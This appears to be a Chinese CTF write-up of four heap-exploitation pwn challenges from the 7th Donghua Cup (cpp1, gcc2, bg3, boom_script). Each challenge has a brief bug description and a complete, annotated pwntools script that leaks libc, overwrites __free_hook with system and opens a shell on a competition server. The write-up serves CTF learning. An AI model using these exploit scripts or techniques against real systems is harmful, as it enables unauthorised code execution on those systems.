东华杯7th

15th,好家伙直接诸神混战。我直接蚌埠住了好吧


本队所有wp在网盘,这里只分享pwn

链接:https://pan.baidu.com/s/1y_otBzxNnE-hZcBHp59rMg
提取码:4x64
–来自百度网盘超级会员V3的分享

题目链接如下

链接:https://pan.baidu.com/s/1NwOwEgtJhp5mNNN_TeM_IA
提取码:ri4y
–来自百度网盘超级会员V3的分享

pwn

cpp1

普通题:堆溢出,不过本人按 off-by-one 打了

from pwn import *
#r=process("./pwn")
# --- cpp1: connection setup and tube shorthands ---------------------------
# `local` selects a local ./pwn process (for gdb) instead of the remote
# service in `target`.  Every alias below looks up the global tube `r` at
# call time, which is why they can be defined before `r` is bound.
local = 0
target = '47.104.143.202:43359'.split(':')
one = []  # template leftover; not referenced anywhere in this script
context.log_level = 'debug'  # pwntools echoes every byte sent/received


def rc():
    return r.recv()


def rx(x):
    return r.recv(x)


def ru(x):
    return r.recvuntil(x)


def rud(x):
    return r.recvuntil(x, drop=True)


def s(x):
    return r.send(x)


def sl(x):
    return r.sendline(x)


def sa(x, y):
    return r.sendafter(x, y)


def sla(x, y):
    return r.sendlineafter(x, y)


def close():
    return r.close()


def debug():
    return gdb.attach(r)


def shell():
    return r.interactive()


if local:
    r = process('./pwn')
else:
    r = remote(target[0], target[1])
# The same libc is loaded in both modes: the remote service is assumed to
# run this exact build, since the script's symbol lookups depend on it.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


def add(idx, size):
    """Menu option 1: allocate slot `idx` with a `size`-byte buffer."""
    for prompt, value in ((">>\n", 1), ("I:>>\n", idx), ("S:>>\n", size)):
        sla(prompt, str(value))

def edit(idx, con):
    """Menu option 2: write payload `con` into slot `idx`.

    `con` is sent exactly as given (bytes or str), without str() conversion.
    """
    sla(">>\n", "2")
    sla("I:>>\n", str(idx))
    sla("V:>>\n", con)

def show(idx):
    """Menu option 3: ask the service to print the contents of slot `idx`."""
    for prompt, value in ((">>\n", 3), ("I:>>\n", idx)):
        sla(prompt, str(value))

def dele(idx):
    """Menu option 4: free slot `idx`."""
    choice, index = "4", str(idx)
    sla(">>\n", choice)
    sla("I:>>\n", index)

# --- cpp1 exploit sequence --------------------------------------------------
# The author describes the bug as a heap overflow that they drive as an
# off-by-one.  Every step below depends on the heap state left by the
# previous one, so the order matters; heap-layout reasoning that the code
# itself does not show is marked as inferred.

# Allocate 9 chunks, free 8, re-take 7, then take slot 7 again with a
# smaller size and show it: the 6 bytes read back are a libc pointer left
# in freed memory (the 7-then-1 pattern suggests a filled tcache followed
# by one non-tcache free — inferred, verify against the binary).
for i in range(9):
    add(i,0xff)
for i in range(8):
    dele(i)
for i in range(7):
    add(i,0xff)
add(7,0xe8)
show(7)
leak=u64(rx(6)+b'\x00'*2)
print(hex(leak))
#raw_input()
# 0x1ebce0 is the author's offset from the leaked pointer to the libc base;
# it is specific to the libc build loaded above.
base=leak-0x1ebce0
# Reset the heap and lay out small chunks so slots 7..10 are neighbours
# (inferred from the sizes: 0x18 -> 0x20 chunks, 0x28 -> 0x30 chunk).
for i in range(9):
    dele(i)
for i in range(7):
    add(i,0x18)
add(7,0x18)
add(8,0x28)
add(9,0x18)
add(10,0x18)
for i in range(7):
    dele(i)
dele(9)
# 0x18 bytes fill slot 7; the extra byte lands on the low byte of slot 8's
# size field (0x31 -> 0x51).  This single byte is the overflow the author
# refers to.
edit(7,b'a'*0x18+b'\x51')
# Freeing slot 8 with the forged size makes the allocator treat it as a
# 0x50 chunk that spans into slot 9's memory (inferred).
dele(8)

# Re-take the enlarged chunk via slot 9; it now overlaps the old slot 9.
add(9,0x48)
free=base+libc.sym["__free_hook"]
# Through the overlap: a fake 0x20 chunk header (p64(0x21)) followed by a
# forward pointer aimed at __free_hook-0x18, plus another size byte 0x21
# to keep the neighbouring header plausible (author's layout, verify).
edit(9,p64(0)*5+p64(0x21)+p64(free-0x18)+b'a'*0x10+b'\x21')
# Restore slot 8's size byte to 0x21.  Note the str payload here while
# every other edit uses bytes; pwntools encodes it, but the mix is fragile.
edit(7,'a'*0x18+'\x21')
# Drain the seven small free chunks, then two more allocations are expected
# to follow the forged pointer so slot 12 lands at __free_hook-0x18.
for i in range(7):
    add(i,0x18)
add(11,0x18)
add(12,0x18)
# `sys` shadows the stdlib module name (also exported by `from pwn import *`);
# harmless in this script but worth renaming if it grows.
sys=base+libc.sym['system']
edit(11,b'/bin/sh\x00\n')
# 8 bytes of filler then system's address: with the -0x18 offset chosen
# above the p64 is expected to cover __free_hook itself (inferred).
edit(12,b'/bin/sh\x00'+p64(sys)+b'\n')
# free("/bin/sh") now runs the hooked function with that string as argument.
dele(11)
#gdb.attach(r)
r.interactive()

gcc2

UAF 打 tcache 泄露 libc,然后直接改 fastbin 的 fd

from pwn import *
import time
# --- gcc2: connection parameters and tube shorthands ----------------------
# The aliases resolve the global tube `r` when called, so they may be
# defined before the connection is opened.
context.arch = 'amd64'
context.log_level = 'debug'  # pwntools echoes every byte sent/received

local = 0
target = '47.104.143.202:15348'.split(':')
one = []  # template leftover; not referenced in this script


# NOTE(review): this `r` is rebound to the tube object once the connection
# is opened, so the alias is dead code; the script reads via rx()/ru().
def r():
    return r.recv()


def rx(x):
    return r.recv(x)


def ru(x):
    return r.recvuntil(x)


def rud(x):
    return r.recvuntil(x, drop=True)


def s(x):
    return r.send(x)


def sl(x):
    return r.sendline(x)


def sa(x, y):
    return r.sendafter(x, y)


def sla(x, y):
    return r.sendlineafter(x, y)


def close():
    return r.close()


def debug():
    return gdb.attach(r)


def shell():
    return r.interactive()

def menu(idx):
    """Answer the main `>>` prompt with option number `idx`."""
    choice = str(idx)
    sla('>>', choice)

def add(idx, size):
    """Option 1: allocate slot `idx` with a `size`-byte buffer."""
    menu(1)
    for prompt, value in (('I:>>', idx), ('S:>>', size)):
        sla(prompt, str(value))

def edit(idx, con):
    """Option 2: write `con` (sent as given, no str()) into slot `idx`."""
    menu(2)
    index = str(idx)
    sla('I:>>', index)
    sla('V:>>', con)

def free(idx):
    """Option 4: free slot `idx`."""
    menu(4)
    index = str(idx)
    sla('I:>>', index)

def show(idx):
    """Option 3: ask the service to print slot `idx`."""
    menu(3)
    index = str(idx)
    sla('I:>>', index)

# Bind the tube: a local ./rz process when `local` is set, otherwise the
# remote service.  The libc path is the same in both modes.
r = process('./rz') if local else remote(target[0], target[1])
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# --- gcc2 exploit sequence --------------------------------------------------
# Author's summary: use-after-free on tcache chunks to leak, then overwrite
# a fastbin fd.  Steps are order-dependent; layout claims the code does not
# show are marked as inferred.

# Side-effect-only comprehension (style smell, a plain for-loop is clearer):
# allocates slots 0 and 1.
[add(i,0x67) for i in range(2)]
add(4,0x67)
free(1)
free(0)
# show(0) after free(0) is the UAF read: the 6 bytes following the newline
# are the pointer stored in the freed chunk.  0x012f30 and +0x10 are the
# author's build-specific offsets to turn it into a heap base.
show(0)
ru('\n')
heap = u64(rx(6).ljust(8,b'\x00'))-0x012f30+0x10
success(hex(heap))
# UAF write: replace the freed chunk's forward pointer with `heap`, so the
# second allocation below is served from that address.
edit(0,p64(heap))
add(2,0x67)
add(3,0x67)
# Writes a single 0x07 at offset 0x4e of slot 3.  The author does not say
# why; presumably it fills an allocator bookkeeping counter so that the
# following frees bypass the tcache (matches "改fastbin的fd") — verify.
edit(3,b'\x00'*0x48+b'\x00'*6+b'\x07')
free(4)
free(3)
show(3)
# Author's arithmetic from the leaked pointer to the libc base
# (-96-0x10 relative to __malloc_hook); specific to the libc build above.
base = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))-96-0x10-libc.sym['__malloc_hook']
f_hook = libc.sym['__free_hook']+base
system = base+libc.sym['system']
success(hex(f_hook))

# Overwrite the freed slot 4's forward pointer with __free_hook; after two
# allocations slot 6 is expected to land on the hook (inferred).
edit(4,p64(f_hook))
add(5,0x67)
add(6,0x67)
edit(6,p64(system))
edit(5,b'/bin/sh\x00')
# free("/bin/sh") runs the hooked function with that string as argument.
free(5)
# debug()
shell()

bg3

free 时 chunk 的 size 字段没有置 0,导致同一下标重新申请后可以溢出

from pwn import *
import time
# --- bg3: connection parameters and tube shorthands -----------------------
# The aliases resolve the global tube `r` when called, so they may be
# defined before the connection is opened.
context.arch = 'amd64'
context.log_level = 'debug'  # pwntools echoes every byte sent/received

local = 0
target = '47.104.143.202:25997'.split(':')
one = []  # template leftover; not referenced in this script


# NOTE(review): this `r` is rebound to the tube object once the connection
# is opened, so the alias is dead code; the script reads via rx()/ru().
def r():
    return r.recv()


def rx(x):
    return r.recv(x)


def ru(x):
    return r.recvuntil(x)


def rud(x):
    return r.recvuntil(x, drop=True)


def s(x):
    return r.send(x)


def sl(x):
    return r.sendline(x)


def sa(x, y):
    return r.sendafter(x, y)


def sla(x, y):
    return r.sendlineafter(x, y)


def close():
    return r.close()


def debug():
    return gdb.attach(r)


def shell():
    return r.interactive()

def menu(idx):
    """Answer the `Select:` prompt with option number `idx`."""
    choice = str(idx)
    sla('Select:', choice)

def add(idx, size):
    """Option 1: allocate slot `idx` with a payload buffer of `size` bytes."""
    menu(1)
    for prompt, value in (('Index:', idx), ('PayloadLength:', size)):
        sla(prompt, str(value))

def edit(idx, con):
    """Option 2: write `con` (sent as given, no str()) into slot `idx`."""
    menu(2)
    index = str(idx)
    sla('Index:', index)
    sla('BugInfo:', con)

def free(idx):
    """Option 4: free slot `idx`."""
    menu(4)
    index = str(idx)
    sla('Index:', index)

def show(idx):
    """Option 3: ask the service to print slot `idx`."""
    menu(3)
    index = str(idx)
    sla('Index:', index)

# Bind the tube: a local ./pwn process when `local` is set, otherwise the
# remote service.  The libc path is the same in both modes.
r = process('./pwn') if local else remote(target[0], target[1])
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


# --- bg3 exploit sequence ---------------------------------------------------
# Author's description of the bug: free() does not clear the stored length,
# so re-allocating the same index keeps the old (larger) length and a later
# edit can write past the new, smaller chunk.
add(0,0x665)
add(1,0x68)
add(2,0x68)
free(0)
# Re-use index 0 with a small chunk carved from the freed big one; the
# stale 0x665 length is what lets edit(0, ...) below overflow.
add(0,0x68)
# The fresh chunk still holds a libc pointer from its time in a free list,
# which show(0) prints (inferred from the arithmetic below).
show(0)
# Author's arithmetic from the leaked pointer to the libc base
# (-1248-0x10 relative to __malloc_hook); specific to the libc build above.
base = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))-1248-0x10-libc.sym['__malloc_hook']
f_hook = base +libc.sym['__free_hook']
system = base+libc.sym['system']
success(hex(f_hook))

# Two more 0x70 chunks, expected to follow slot 0 in memory (inferred),
# then freed so they sit on a free list.
add(3,0x68)
add(4,0x68)
free(4)
free(3)
# 0x68 bytes of filler reach the end of slot 0's data; p64(0x71) rewrites
# the next chunk's size field and p64(f_hook) its forward pointer, steering
# the free list at __free_hook.
pl = b'\x00'*0x68+p64(0x71)+p64(f_hook)
edit(0,pl)
add(5,0x68)
add(6,0x68)
edit(5,b'/bin/sh\x00')
# Slot 6 is expected to sit on __free_hook; write system's address there.
edit(6,p64(system))
# free("/bin/sh") runs the hooked function with that string as argument.
free(5)
# debug()
# edit(0,'a'*0x68)

shell()

boom_script

定义变量时用 malloc 存储,重新定义同名变量会先 free 原来的再申请新的;并且可以利用数组的存储配合 input 达到任意写的效果

from pwn import *
# --- boom_script: tube and shorthands -------------------------------------
context.log_level = 'debug'  # pwntools echoes every byte sent/received
context.arch = 'amd64'
libc = ELF("./libc.so.6")  # challenge-provided libc, used for symbol offsets
p = remote("47.104.143.202", 41299)


def s(data):
    return p.send(data)


def sa(delim, data):
    return p.sendafter(delim, data)


def sl(data):
    return p.sendline(data)


def sla(delim, data):
    return p.sendlineafter(delim, data)


def r(numb=4096):
    return p.recv(numb)


def ru(delims, drop=True):
    # `drop` is forwarded positionally, exactly like the original alias.
    return p.recvuntil(delims, drop)


def shell():
    return p.interactive()


def uu32(data):
    """Unpack up to 4 bytes as a little-endian u32, zero-padded on the right."""
    return u32(data.ljust(4, b'\0'))


def uu64(data):
    """Unpack up to 8 bytes as a little-endian u64, zero-padded on the right."""
    return u64(data.ljust(8, b'\0'))


# --- boom_script exploit ----------------------------------------------------
# Author's description of the bug: every variable definition is backed by
# malloc and redefining a name frees the old buffer before allocating the
# new one; array element stores combined with inputn() then give an
# arbitrary write.
sla("$",'1')

# Program in the challenge's own scripting language.  `b=a` followed by a
# redefinition of `a` leaves `b` pointing at freed memory, and prints(b)
# dumps it — that is where the libc pointer read below comes from.  The two
# prints("ljdhba") lines are markers this script waits for before answering
# each inputn(c).  Which redefinitions shape the heap for the final write is
# not explained by the author; treat the sequence as empirically tuned.
code="""
a="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsa123altaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamha";
b=a;
a="bbbbbb";
c=0;
prints(b);
array arr[20];
arr[0]=1;
arr[1]=2;
b="666666";
a1="1";
a2="2";
a3="3";
a3="3";
a4="4";
a5="5";
a9="cccccccc";
k="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaam";
a6="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaam";
a7="/bin/sh";
a8="/bin/sh";
a6="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaa";
k="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaa";
prints("ljdhba");
inputn(c);
arr[0]=c;
arr[1]=c;
k1="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaam";
array arr1[1];
prints("ljdhba");
inputn(c);
arr1[0]=c;
a7="7";
"""
# The service asks for the program length first, then the program text.
sla("length:\n",str(len(code)+1))
sla("code:\n",code)
# 0x1ebbe0 is the author's offset from the leaked pointer to the libc base;
# specific to the ./libc.so.6 loaded above.
libc_base=uu64(ru("\x7f",drop=False)[-6:])-0x1ebbe0
# A libc-relative gadget offset: computed and printed, but not used by the
# two writes below (they use system instead).
one=libc_base+0xe6c7e
print("libc_base",hex(libc_base))
fh=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
print('one',hex(one))

# Answers to the two inputn(c) calls: the first value is stored into
# arr[0]/arr[1], the second into arr1[0].  Per the author these array stores
# are what place system's address over __free_hook; the -0x28 adjustment is
# not explained — presumably it lines arr1's backing buffer up with the hook,
# verify against the interpreter.
sla("ljdhba\n",str(fh-0x28))
sla("ljdhba\n",str(system))
shell()
